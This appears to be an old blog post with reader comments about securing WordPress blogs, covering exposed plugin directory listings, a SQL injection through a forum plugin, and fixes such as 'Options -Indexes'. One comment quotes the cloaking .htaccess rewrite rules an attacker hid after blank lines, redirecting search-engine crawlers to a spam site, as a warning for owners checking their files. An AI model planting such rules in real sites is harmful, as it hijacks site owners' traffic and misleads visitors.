Are you running a WordPress blog on your website space? If Yes, better be careful as it may be opened to hackers. However, there are some methods of prevention shared by fellow blogger; AshChuan. Her blog was recently hacked into on January 24 and luckily no data was loss.
She wrote in another post later of tips she found from Matt Cutts (Google employee) to your protect WordPress blog. And I seriously never noticed how much WordPress may be lacking in security.
Try entering this into your browser window (or new tab) – replace where necessary:
http://www.your-domain.com/wp-content/plugins/
You’ll find that your WordPress plugins list is actually open for the whole Internet to see. This seriously was a shocker for me. And it was one of the steps the hacker used to hack Ashley’s blog. By gaining access to the WordPress plugins, the hacker exploited one of the buggy plugins; wordpress forum plugin v1.7.4 by fredrik fahlstad.
According to Ash, the plugin allowed a hacker to perform a remote sql injection exploit. She reported the hacker gained access into her WordPress blog admin and changed her password. Luckily, the database wasn’t damaged from the incident.
Matt Cutts said by uploading an ordinary index.html prevents a person from loading your plugins list. I’ve done it and works like a charm. However, I’m now worried of other possible folders accessible as I’ve tested.
If you’d like to further secure your WordPress blog, there’s a. .htaccess method you can perform. The details could either be gotten from AshChuan’s blog or Matt Cutts blog.
Any other WordPress security measures you would like to share?
Updated: January 3, 2008
Geminigeek shared by adding Options -Indexes to your .htaccess is an easier way than creating index.html in all the WordPress folders.You will find the .htaccess in your blog directory – folder you installed your blog. Otherwise, you’ll need to create a new .htaccess file.
[tags]Wordpress hack, Hacking wordpress, WordPress plugin bug[/tags]
Thanks for the tips. Basically I don’t have any protection before.
Put in Options -Indexes to your .htaccess is way faster than manually creating an index file to each directory. It works for me.
plantmy:
Well, a lesson learnt is a benefit gained. Or it goes something like that.
gemini:
Thanks for the suggestion. I’ve done that and it is easier. Will update the article. :)
Thanks for the info.
There’s a pretty comprehensive whitepaper on securing WordPress installations by blogsecurity.net.
Worth downloading. It’s free. I’ve written a summary about the whitepaper on my website.
http://ashchuan.com/blog/2008/02/03/securing-your-wordpress-installation/
Thanks for the sharing, Ash. I’m going to download and have a read through. :)
Adding index.html in the plugin folder will not prevent hackers from knowing your plugin list.
Thanks for sharing, tk2.
Hope you’d be able to share a securer way since you came up with an automated way to guess what plugins could the author be running. :)
Another method is called “cloaking” in which your website gets re-directed to a spammy website if you are google spider bot. This is difficult to spot, given that we are not the google spider bot, but the good news is that we can pretend to be. Just install the “User Agent Switcher” for Firefox and add a definition for googlebot (see http://www.searchenginejournal.com/how-to-switch-your-user-agent-to-googlebot/7249/)
How did they do it?
This is what they added to my .htaccess file after many *blank lines* (so that you could easily miss this addition!!!):
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://spammy_website/ [R=301,L]71
N.B. make sure you scroll down to the end of your .htaccess file when checking!
Wow! They hacked your site and added something to the .htaccess. Now that’s bad. Thankfully, my host security hasn’t experienced this yet and I hope it doesn’t happen.
Very informative. I must check my blog now.
End of the day, if they really wanted to do something to your website/blog – they will. But it’s still good to have preventions in place. :)